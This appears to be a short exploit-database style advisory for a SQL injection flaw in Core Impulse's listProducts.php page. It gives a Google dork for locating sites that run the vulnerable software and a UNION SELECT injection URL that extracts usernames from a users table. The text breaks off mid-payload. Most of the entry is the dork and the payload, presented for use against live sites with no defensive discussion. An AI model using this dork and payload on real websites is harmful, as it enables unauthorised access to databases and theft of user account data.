core-sql.txt

Core Impulse SQL Injection vulnerability Vendor site: www.coreimpulse.com discovered by: e.wiZz! Dork: inurl:/products/listProducts.php?cat or inurl:listProducts.php?cat Exploit: http://www.somesite.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+username,2,3+FROM+users/...